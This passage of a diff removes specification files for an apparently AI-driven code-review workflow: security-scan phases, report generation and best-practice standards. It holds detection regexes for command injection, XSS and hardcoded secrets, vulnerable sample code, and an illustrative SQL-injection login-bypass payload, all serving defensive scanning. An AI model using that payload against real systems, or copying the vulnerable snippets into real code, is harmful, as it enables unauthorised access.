code: match[0],
|
||||
file: file.path,
|
||||
message: 'Potential SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries or ORM methods',
|
||||
cwe: 'CWE-89',
|
||||
owasp: 'A03:2021 - Injection'
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Command Injection**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized input in exec/spawn
|
||||
const commandInjectionPatterns = [
|
||||
/exec\(.*\$\{.*\}/, // exec with template literal
|
||||
/spawn\(.*,\s*\[.*\$\{.*\}.*\]\)/, // spawn with unsanitized args
|
||||
/execSync\(.*\+.*\)/, // execSync with concatenation
|
||||
];
|
||||
```
|
||||
|
||||
**XSS (Cross-Site Scripting)**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized user input in DOM/HTML
|
||||
const xssPatterns = [
|
||||
/innerHTML\s*=.*\$\{.*\}/, // innerHTML with template literal
|
||||
/dangerouslySetInnerHTML/, // React dangerous prop
|
||||
/document\.write\(.*\)/, // document.write
|
||||
/<\w+.*\$\{.*\}.*>/, // JSX with unsanitized data
|
||||
];
|
||||
```
|
||||
|
||||
#### B. Authentication & Authorization
|
||||
|
||||
```javascript
|
||||
// Pattern: Weak authentication
|
||||
const authPatterns = [
|
||||
/password\s*===?\s*['"]/, // Hardcoded password comparison
|
||||
/jwt\.sign\(.*,\s*['"][^'"]{1,16}['"]\)/, // Weak JWT secret
|
||||
/bcrypt\.hash\(.*,\s*[1-9]\s*\)/, // Low bcrypt rounds
|
||||
/md5\(.*password.*\)/, // MD5 for passwords
|
||||
/if\s*\(\s*user\s*\)\s*\{/, // Missing auth check
|
||||
];
|
||||
|
||||
// Check for missing authorization
|
||||
const authzPatterns = [
|
||||
/router\.(get|post|put|delete)\(.*\)\s*=>/, // No middleware
|
||||
/app\.use\([^)]*\)\s*;(?!.*auth)/, // Missing auth middleware
|
||||
];
|
||||
```
|
||||
|
||||
#### C. Sensitive Data Exposure
|
||||
|
||||
```javascript
|
||||
// Pattern: Sensitive data in logs/responses
|
||||
const sensitiveDataPatterns = [
|
||||
/(password|secret|token|key)\s*:/i, // Sensitive keys in objects
|
||||
/console\.log\(.*password.*\)/i, // Password in logs
|
||||
/res\.send\(.*user.*password.*\)/, // Password in response
|
||||
/(api_key|apikey)\s*=\s*['"]/i, // Hardcoded API keys
|
||||
];
|
||||
```
|
||||
|
||||
#### D. Security Misconfiguration
|
||||
|
||||
```javascript
|
||||
// Pattern: Insecure configurations
|
||||
const misconfigPatterns = [
|
||||
/cors\(\{.*origin:\s*['"]?\*['"]?.*\}\)/, // CORS wildcard
|
||||
/https?\s*:\s*false/, // HTTPS disabled
|
||||
/helmet\(\)/, // Missing helmet config
|
||||
/strictMode\s*:\s*false/, // Strict mode disabled
|
||||
];
|
||||
```
|
||||
|
||||
### Step 4: Language-Specific Checks
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
```javascript
|
||||
const jsFindings = [
|
||||
checkPrototypePollution(content),
|
||||
checkEvalUsage(content),
|
||||
checkUnsafeRegex(content),
|
||||
checkWeakCrypto(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Python**:
|
||||
```javascript
|
||||
const pythonFindings = [
|
||||
checkPickleVulnerabilities(content),
|
||||
checkYamlUnsafeLoad(content),
|
||||
checkSqlAlchemy(content),
|
||||
checkFlaskSecurityHeaders(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Java**:
|
||||
```javascript
|
||||
const javaFindings = [
|
||||
checkDeserialization(content),
|
||||
checkXXE(content),
|
||||
checkPathTraversal(content),
|
||||
checkSQLInjection(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Go**:
|
||||
```javascript
|
||||
const goFindings = [
|
||||
checkRaceConditions(content),
|
||||
checkSQLInjection(content),
|
||||
checkPathTraversal(content),
|
||||
checkCryptoWeakness(content),
|
||||
];
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Security Findings File
|
||||
|
||||
Save to `.code-review/security-findings.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T11:00:00Z",
|
||||
"total_findings": 24,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 8,
|
||||
"medium": 10,
|
||||
"low": 3
|
||||
},
|
||||
"by_category": {
|
||||
"injection": 5,
|
||||
"authentication": 3,
|
||||
"data_exposure": 4,
|
||||
"misconfiguration": 6,
|
||||
"xss": 3,
|
||||
"other": 3
|
||||
},
|
||||
"findings": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145,
|
||||
"column": 12,
|
||||
"code": "const query = `SELECT * FROM users WHERE username = '${username}'`;",
|
||||
"message": "SQL Injection vulnerability: User input directly concatenated in SQL query",
|
||||
"cwe": "CWE-89",
|
||||
"owasp": "A03:2021 - Injection",
|
||||
"recommendation": {
|
||||
"description": "Use parameterized queries to prevent SQL injection",
|
||||
"fix_example": "const query = 'SELECT * FROM users WHERE username = ?';\ndb.execute(query, [username]);"
|
||||
},
|
||||
"references": [
|
||||
"https://owasp.org/www-community/attacks/SQL_Injection",
|
||||
"https://cwe.mitre.org/data/definitions/89.html"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Security Report
|
||||
|
||||
Generate markdown report:
|
||||
|
||||
```markdown
|
||||
# Security Analysis Report
|
||||
|
||||
**Scan Date**: 2024-01-15 11:00:00
|
||||
**Files Analyzed**: 57 (Critical + High priority)
|
||||
**Total Findings**: 24
|
||||
|
||||
## Severity Summary
|
||||
|
||||
| Severity | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Critical | 3 | 12.5% |
|
||||
| High | 8 | 33.3% |
|
||||
| Medium | 10 | 41.7% |
|
||||
| Low | 3 | 12.5% |
|
||||
|
||||
## Critical Findings (Requires Immediate Action)
|
||||
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
|
||||
### 🔴 [SEC-002] Hardcoded JWT Secret
|
||||
|
||||
**File**: `src/auth/jwt.ts:23`
|
||||
**CWE**: CWE-798 | **OWASP**: A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const token = jwt.sign(payload, 'mysecret123', { expiresIn: '1h' });
|
||||
\`\`\`
|
||||
|
||||
**Issue**: JWT secret is hardcoded and weak (only 11 characters).
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use environment variable with strong secret
|
||||
const token = jwt.sign(payload, process.env.JWT_SECRET, {
|
||||
expiresIn: '1h',
|
||||
algorithm: 'HS256'
|
||||
});
|
||||
|
||||
// Generate strong secret (32+ bytes):
|
||||
// node -e "console.log(require('crypto').randomBytes(32).toString('hex'))"
|
||||
\`\`\`
|
||||
|
||||
---
|
||||
|
||||
## High Findings
|
||||
|
||||
### 🟠 [SEC-003] Missing Input Validation
|
||||
|
||||
**File**: `src/api/users.ts:67`
|
||||
**CWE**: CWE-20 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
...
|
||||
|
||||
## Medium Findings
|
||||
|
||||
...
|
||||
|
||||
## Remediation Priority
|
||||
|
||||
1. **Critical (3)**: Fix within 24 hours
|
||||
2. **High (8)**: Fix within 1 week
|
||||
3. **Medium (10)**: Fix within 1 month
|
||||
4. **Low (3)**: Fix in next release
|
||||
|
||||
## Compliance Impact
|
||||
|
||||
- **PCI DSS**: 4 findings affect compliance (SEC-001, SEC-002, SEC-008, SEC-011)
|
||||
- **HIPAA**: 2 findings affect compliance (SEC-005, SEC-009)
|
||||
- **GDPR**: 3 findings affect compliance (SEC-002, SEC-005, SEC-007)
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "02-security-analysis",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T11:15:00Z",
|
||||
"input": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"files_analyzed": 57
|
||||
},
|
||||
"output": {
|
||||
"findings_path": ".code-review/security-findings.json",
|
||||
"total_findings": 24,
|
||||
"critical_count": 3,
|
||||
"high_count": 8
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 2 of the Code Review workflow. Your task is to analyze code for security vulnerabilities.
|
||||
|
||||
**Instructions**:
|
||||
1. Load file inventory from Phase 1
|
||||
2. Focus on Critical + High priority files
|
||||
3. Run security checks for:
|
||||
- OWASP Top 10 vulnerabilities
|
||||
- CWE Top 25 weaknesses
|
||||
- Language-specific security patterns
|
||||
4. Use smart_search with mode="ripgrep" for pattern matching
|
||||
5. Use mcp__ace-tool__search_context for semantic security pattern discovery
|
||||
6. Classify findings by severity (Critical/High/Medium/Low)
|
||||
7. Generate security-findings.json and markdown report
|
||||
8. Proceed to Phase 3 (Best Practices Review)
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (pattern search)
|
||||
- mcp__ace-tool__search_context (semantic search)
|
||||
- Read (read file content)
|
||||
- Write (save findings and reports)
|
||||
- Grep (targeted pattern matching)
|
||||
|
||||
**Output Requirements**:
|
||||
- security-findings.json with detailed findings
|
||||
- Security report in markdown format
|
||||
- Each finding must include: file, line, severity, CWE, OWASP, fix recommendation
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 3:
|
||||
|
||||
- ✅ All Critical + High priority files analyzed
|
||||
- ✅ Findings categorized by severity
|
||||
- ✅ Each finding has fix recommendation
|
||||
- ✅ CWE and OWASP mappings included
|
||||
- ✅ Security report generated
|
||||
- ✅ State saved
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 3: Best Practices Review** - Analyze code quality, performance, and maintainability issues.
|
||||
@@ -1,36 +0,0 @@
|
||||
# Phase 3: Best Practices Review
|
||||
|
||||
## Objective
|
||||
|
||||
Analyze code for best practices violations including code quality, performance issues, and maintainability concerns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Security Findings**: From Phase 2 (`.code-review/security-findings.json`)
|
||||
- **User Arguments**:
|
||||
- `--focus best-practices`: Best practices only mode
|
||||
- `--check quality,performance,maintainability`: Specific areas to check
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Code Quality Analysis
|
||||
|
||||
Check naming conventions, function complexity, code duplication, and dead code detection.
|
||||
|
||||
### Step 2: Performance Analysis
|
||||
|
||||
Detect N+1 queries, inefficient algorithms, and memory leaks.
|
||||
|
||||
### Step 3: Maintainability Analysis
|
||||
|
||||
Check documentation coverage, test coverage, and dependency management.
|
||||
|
||||
## Output
|
||||
|
||||
- best-practices-findings.json
|
||||
- Markdown report with recommendations
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 4: Report Generation**
|
||||
@@ -1,278 +0,0 @@
|
||||
# Phase 4: Report Generation
|
||||
|
||||
## Objective
|
||||
|
||||
Consolidate security and best practices findings into a comprehensive, actionable code review report.
|
||||
|
||||
## Input
|
||||
|
||||
- **Security Findings**: `.code-review/security-findings.json`
|
||||
- **Best Practices Findings**: `.code-review/best-practices-findings.json`
|
||||
- **File Inventory**: `.code-review/inventory.json`
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load All Findings
|
||||
|
||||
```javascript
|
||||
const securityFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/security-findings.json' })
|
||||
);
|
||||
const bestPracticesFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/best-practices-findings.json' })
|
||||
);
|
||||
const inventory = JSON.parse(
|
||||
await Read({ file_path: '.code-review/inventory.json' })
|
||||
);
|
||||
```
|
||||
|
||||
### Step 2: Aggregate Statistics
|
||||
|
||||
```javascript
|
||||
const stats = {
|
||||
total_files_reviewed: inventory.total_files,
|
||||
total_findings: securityFindings.total_findings + bestPracticesFindings.total_findings,
|
||||
by_severity: {
|
||||
critical: securityFindings.by_severity.critical,
|
||||
high: securityFindings.by_severity.high + bestPracticesFindings.by_severity.high,
|
||||
medium: securityFindings.by_severity.medium + bestPracticesFindings.by_severity.medium,
|
||||
low: securityFindings.by_severity.low + bestPracticesFindings.by_severity.low,
|
||||
},
|
||||
by_category: {
|
||||
security: securityFindings.total_findings,
|
||||
code_quality: bestPracticesFindings.by_category.code_quality,
|
||||
performance: bestPracticesFindings.by_category.performance,
|
||||
maintainability: bestPracticesFindings.by_category.maintainability,
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 3: Generate Comprehensive Report
|
||||
|
||||
```markdown
|
||||
# Comprehensive Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
## Executive Summary
|
||||
|
||||
{Provide high-level overview of code health}
|
||||
|
||||
### Risk Assessment
|
||||
|
||||
{Calculate risk score based on findings}
|
||||
|
||||
### Compliance Status
|
||||
|
||||
{Map findings to compliance requirements}
|
||||
|
||||
## Detailed Findings
|
||||
|
||||
{Merge and organize security + best practices findings}
|
||||
|
||||
## Action Plan
|
||||
|
||||
{Prioritized list of fixes with effort estimates}
|
||||
|
||||
## Appendix
|
||||
|
||||
{Technical details, references, configuration}
|
||||
```
|
||||
|
||||
### Step 4: Generate Fix Tracking Checklist
|
||||
|
||||
Create actionable checklist for developers:
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
## Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] [SEC-001] SQL Injection in src/auth/user-service.ts:145
|
||||
- [ ] [SEC-002] Hardcoded JWT Secret in src/auth/jwt.ts:23
|
||||
- [ ] [SEC-003] XSS Vulnerability in src/api/comments.ts:89
|
||||
|
||||
## High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] [SEC-004] Missing Authorization Check in src/api/admin.ts:34
|
||||
- [ ] [BP-001] N+1 Query Pattern in src/api/orders.ts:45
|
||||
...
|
||||
```
|
||||
|
||||
### Step 5: Generate Metrics Dashboard
|
||||
|
||||
```markdown
|
||||
## Code Health Metrics
|
||||
|
||||
### Security Score: 68/100
|
||||
- Critical Issues: 3 (-30 points)
|
||||
- High Issues: 8 (-2 points each)
|
||||
|
||||
### Code Quality Score: 75/100
|
||||
- High Complexity Functions: 2
|
||||
- Code Duplication: 5%
|
||||
- Dead Code: 3 instances
|
||||
|
||||
### Performance Score: 82/100
|
||||
- N+1 Queries: 3
|
||||
- Inefficient Algorithms: 2
|
||||
|
||||
### Maintainability Score: 70/100
|
||||
- Documentation Coverage: 65%
|
||||
- Test Coverage: 72%
|
||||
- Missing Tests: 5 files
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Main Report
|
||||
|
||||
Save to `.code-review/REPORT.md`:
|
||||
|
||||
- Executive summary
|
||||
- Detailed findings (security + best practices)
|
||||
- Action plan with priorities
|
||||
- Metrics and scores
|
||||
- References and compliance mapping
|
||||
|
||||
### Fix Checklist
|
||||
|
||||
Save to `.code-review/FIX-CHECKLIST.md`:
|
||||
|
||||
- Organized by severity
|
||||
- Checkboxes for tracking
|
||||
- File:line references
|
||||
- Effort estimates
|
||||
|
||||
### JSON Summary
|
||||
|
||||
Save to `.code-review/summary.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"total_findings": 69,
|
||||
"by_severity": { "critical": 3, "high": 13, "medium": 30, "low": 23 },
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true
|
||||
}
|
||||
```
|
||||
|
||||
## Report Template
|
||||
|
||||
Full report includes:
|
||||
|
||||
1. **Executive Summary**
|
||||
- Overall code health
|
||||
- Risk assessment
|
||||
- Key recommendations
|
||||
|
||||
2. **Security Findings** (from Phase 2)
|
||||
- Critical/High/Medium/Low
|
||||
- OWASP/CWE mappings
|
||||
- Fix recommendations with code examples
|
||||
|
||||
3. **Best Practices Findings** (from Phase 3)
|
||||
- Code quality issues
|
||||
- Performance concerns
|
||||
- Maintainability gaps
|
||||
|
||||
4. **Metrics Dashboard**
|
||||
- Security score
|
||||
- Code quality score
|
||||
- Performance score
|
||||
- Maintainability score
|
||||
|
||||
5. **Action Plan**
|
||||
- Immediate actions (critical)
|
||||
- Short-term (1 week)
|
||||
- Medium-term (1 month)
|
||||
- Long-term (3 months)
|
||||
|
||||
6. **Compliance Impact**
|
||||
- PCI DSS findings
|
||||
- HIPAA findings
|
||||
- GDPR findings
|
||||
- SOC 2 findings
|
||||
|
||||
7. **Appendix**
|
||||
- Full findings list
|
||||
- Configuration used
|
||||
- Tools and versions
|
||||
- References
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "04-report-generation",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T12:00:00Z",
|
||||
"input": {
|
||||
"security_findings": ".code-review/security-findings.json",
|
||||
"best_practices_findings": ".code-review/best-practices-findings.json"
|
||||
},
|
||||
"output": {
|
||||
"report": ".code-review/REPORT.md",
|
||||
"checklist": ".code-review/FIX-CHECKLIST.md",
|
||||
"summary": ".code-review/summary.json"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 4 (FINAL) of the Code Review workflow. Generate comprehensive report.
|
||||
|
||||
**Instructions**:
|
||||
1. Load security findings from Phase 2
|
||||
2. Load best practices findings from Phase 3
|
||||
3. Aggregate statistics and calculate scores
|
||||
4. Generate comprehensive markdown report
|
||||
5. Create fix tracking checklist
|
||||
6. Generate JSON summary
|
||||
7. Inform user of completion and output locations
|
||||
|
||||
**Tools Available**:
|
||||
- Read (load findings)
|
||||
- Write (save reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- REPORT.md (comprehensive markdown report)
|
||||
- FIX-CHECKLIST.md (actionable checklist)
|
||||
- summary.json (machine-readable summary)
|
||||
- All files in .code-review/ directory
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Action plan generated
|
||||
- ✅ Reports saved to .code-review/
|
||||
- ✅ User notified of completion
|
||||
|
||||
## Completion
|
||||
|
||||
Code review complete! Outputs available in `.code-review/` directory.
|
||||
@@ -1,346 +0,0 @@
|
||||
# Best Practices Requirements Specification
|
||||
|
||||
## Code Quality Standards
|
||||
|
||||
### Naming Conventions
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Functions/Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`, `API_BASE_URL`)
|
||||
- Private properties: prefix with `_` or `#` (`_cache`, `#secretKey`)
|
||||
|
||||
**Python**:
|
||||
- Classes: PascalCase (`UserService`, `DatabaseConnection`)
|
||||
- Functions: snake_case (`get_user_by_id`, `validate_email`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Private: prefix with `_` (`_internal_cache`)
|
||||
|
||||
**Java**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Packages: lowercase (`com.example.service`)
|
||||
|
||||
### Function Complexity
|
||||
|
||||
**Cyclomatic Complexity Thresholds**:
|
||||
- **Low**: 1-5 (simple functions, easy to test)
|
||||
- **Medium**: 6-10 (acceptable, well-structured)
|
||||
- **High**: 11-20 (needs refactoring)
|
||||
- **Very High**: 21+ (critical, must refactor)
|
||||
|
||||
**Calculation**:
|
||||
```
|
||||
Complexity = 1 (base)
|
||||
+ count(if)
|
||||
+ count(else if)
|
||||
+ count(while)
|
||||
+ count(for)
|
||||
+ count(case)
|
||||
+ count(catch)
|
||||
+ count(&&)
|
||||
+ count(||)
|
||||
+ count(? :)
|
||||
```
|
||||
|
||||
### Code Duplication
|
||||
|
||||
**Thresholds**:
|
||||
- **Acceptable**: < 3% duplication
|
||||
- **Warning**: 3-5% duplication
|
||||
- **Critical**: > 5% duplication
|
||||
|
||||
**Detection**:
|
||||
- Minimum block size: 5 lines
|
||||
- Similarity threshold: 85%
|
||||
- Ignore: Comments, imports, trivial getters/setters
|
||||
|
||||
### Dead Code Detection
|
||||
|
||||
**Targets**:
|
||||
- Unused imports
|
||||
- Unused variables/functions (not exported)
|
||||
- Unreachable code (after return/throw)
|
||||
- Commented-out code blocks (> 5 lines)
|
||||
|
||||
## Performance Standards
|
||||
|
||||
### N+1 Query Prevention
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ N+1 Query
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
}
|
||||
|
||||
// ✅ Batch Query
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
```
|
||||
|
||||
### Algorithm Efficiency
|
||||
|
||||
**Common Issues**:
|
||||
- Nested loops (O(n²)) when O(n) possible
|
||||
- Array.indexOf in loop → use Set.has()
|
||||
- Array.filter().length → use Array.some()
|
||||
- Multiple array iterations → combine into one pass
|
||||
|
||||
**Acceptable Complexity**:
|
||||
- **O(1)**: Ideal for lookups
|
||||
- **O(log n)**: Good for search
|
||||
- **O(n)**: Acceptable for linear scan
|
||||
- **O(n log n)**: Acceptable for sorting
|
||||
- **O(n²)**: Avoid if possible, document if necessary
|
||||
|
||||
### Memory Leak Prevention
|
||||
|
||||
**Common Issues**:
|
||||
- Event listeners without cleanup
|
||||
- setInterval without clearInterval
|
||||
- Global variable accumulation
|
||||
- Circular references
|
||||
- Large array/object allocations
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// ❌ Memory Leak
|
||||
element.addEventListener('click', handler);
|
||||
// No cleanup
|
||||
|
||||
// ✅ Proper Cleanup
|
||||
useEffect(() => {
|
||||
element.addEventListener('click', handler);
|
||||
return () => element.removeEventListener('click', handler);
|
||||
}, []);
|
||||
```
|
||||
|
||||
### Resource Cleanup
|
||||
|
||||
**Required Cleanup**:
|
||||
- Database connections
|
||||
- File handles
|
||||
- Network sockets
|
||||
- Timers (setTimeout, setInterval)
|
||||
- Event listeners
|
||||
|
||||
## Maintainability Standards
|
||||
|
||||
### Documentation Requirements
|
||||
|
||||
**Required for**:
|
||||
- All exported functions/classes
|
||||
- Public APIs
|
||||
- Complex algorithms
|
||||
- Non-obvious business logic
|
||||
|
||||
**JSDoc Format**:
|
||||
```javascript
|
||||
/**
|
||||
* Validates user credentials and generates JWT token
|
||||
*
|
||||
* @param {string} username - User's username or email
|
||||
* @param {string} password - Plain text password
|
||||
* @returns {Promise<{token: string, expiresAt: Date}>} JWT token and expiration
|
||||
* @throws {AuthenticationError} If credentials are invalid
|
||||
*
|
||||
* @example
|
||||
* const {token} = await authenticateUser('john@example.com', 'secret123');
|
||||
*/
|
||||
async function authenticateUser(username, password) {
|
||||
// ...
|
||||
}
|
||||
```
|
||||
|
||||
**Coverage Targets**:
|
||||
- Critical modules: 100%
|
||||
- High priority: 90%
|
||||
- Medium priority: 70%
|
||||
- Low priority: 50%
|
||||
|
||||
### Test Coverage Requirements
|
||||
|
||||
**Coverage Targets**:
|
||||
- Unit tests: 80% line coverage
|
||||
- Integration tests: Key workflows covered
|
||||
- E2E tests: Critical user paths covered
|
||||
|
||||
**Required Tests**:
|
||||
- All exported functions
|
||||
- All public methods
|
||||
- Error handling paths
|
||||
- Edge cases
|
||||
|
||||
**Test File Convention**:
|
||||
```
|
||||
src/auth/login.ts
|
||||
→ src/auth/login.test.ts (unit)
|
||||
→ src/auth/login.integration.test.ts (integration)
|
||||
```
|
||||
|
||||
### Dependency Management
|
||||
|
||||
**Best Practices**:
|
||||
- Pin major versions (`"^1.2.3"` not `"*"`)
|
||||
- Avoid 0.x versions in production
|
||||
- Regular security audits (npm audit, snyk)
|
||||
- Keep dependencies up-to-date
|
||||
- Minimize dependency count
|
||||
|
||||
**Version Pinning**:
|
||||
```json
|
||||
{
|
||||
"dependencies": {
|
||||
"express": "^4.18.0", // ✅ Pinned major version
|
||||
"lodash": "*", // ❌ Wildcard
|
||||
"legacy-lib": "^0.5.0" // ⚠️ Unstable 0.x
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Magic Numbers
|
||||
|
||||
**Definition**: Numeric literals without clear meaning
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Magic numbers
|
||||
if (user.age > 18) { }
|
||||
setTimeout(() => {}, 5000);
|
||||
buffer = new Array(1048576);
|
||||
|
||||
// ✅ Named constants
|
||||
const LEGAL_AGE = 18;
|
||||
const RETRY_DELAY_MS = 5000;
|
||||
const BUFFER_SIZE_1MB = 1024 * 1024;
|
||||
|
||||
if (user.age > LEGAL_AGE) { }
|
||||
setTimeout(() => {}, RETRY_DELAY_MS);
|
||||
buffer = new Array(BUFFER_SIZE_1MB);
|
||||
```
|
||||
|
||||
**Exceptions** (acceptable magic numbers):
|
||||
- 0, 1, -1 (common values)
|
||||
- 100, 1000 (obvious scaling factors in context)
|
||||
- HTTP status codes (200, 404, 500)
|
||||
|
||||
## Error Handling Standards
|
||||
|
||||
### Required Error Handling
|
||||
|
||||
**Categories**:
|
||||
- Network errors (timeout, connection failure)
|
||||
- Database errors (query failure, constraint violation)
|
||||
- Validation errors (invalid input)
|
||||
- Authentication/Authorization errors
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Silent failure
|
||||
try {
|
||||
await saveUser(user);
|
||||
} catch (err) {
|
||||
// Empty catch
|
||||
}
|
||||
|
||||
// ❌ Generic catch
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
console.log('Error'); // No details
|
||||
}
|
||||
|
||||
// ✅ Proper handling
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
logger.error('Payment processing failed', { orderId: order.id, error: err });
|
||||
throw new PaymentError('Failed to process payment', { cause: err });
|
||||
}
|
||||
```
|
||||
|
||||
### Logging Standards
|
||||
|
||||
**Required Logs**:
|
||||
- Authentication attempts (success/failure)
|
||||
- Authorization failures
|
||||
- Data modifications (create/update/delete)
|
||||
- External API calls
|
||||
- Errors and exceptions
|
||||
|
||||
**Log Levels**:
|
||||
- **ERROR**: System errors, exceptions
|
||||
- **WARN**: Recoverable issues, deprecations
|
||||
- **INFO**: Business events, state changes
|
||||
- **DEBUG**: Detailed troubleshooting info
|
||||
|
||||
**Sensitive Data**:
|
||||
- Never log: passwords, tokens, credit cards, SSNs
|
||||
- Hash/mask: emails, IPs, usernames (in production)
|
||||
|
||||
## Code Structure Standards
|
||||
|
||||
### File Organization
|
||||
|
||||
**Max File Size**: 300 lines (excluding tests)
|
||||
**Max Function Size**: 50 lines
|
||||
|
||||
**Module Structure**:
|
||||
```
|
||||
module/
|
||||
├── index.ts # Public exports
|
||||
├── types.ts # Type definitions
|
||||
├── constants.ts # Constants
|
||||
├── utils.ts # Utilities
|
||||
├── service.ts # Business logic
|
||||
└── service.test.ts # Tests
|
||||
```
|
||||
|
||||
### Import Organization
|
||||
|
||||
**Order**:
|
||||
1. External dependencies
|
||||
2. Internal modules (absolute imports)
|
||||
3. Relative imports
|
||||
4. Type imports (TypeScript)
|
||||
|
||||
```typescript
|
||||
// ✅ Organized imports
|
||||
import express from 'express';
|
||||
import { Logger } from 'winston';
|
||||
|
||||
import { UserService } from '@/services/user';
|
||||
import { config } from '@/config';
|
||||
|
||||
import { validateEmail } from './utils';
|
||||
import { UserRepository } from './repository';
|
||||
|
||||
import type { User, UserCreateInput } from './types';
|
||||
```
|
||||
|
||||
## Scoring System
|
||||
|
||||
### Overall Score Calculation
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
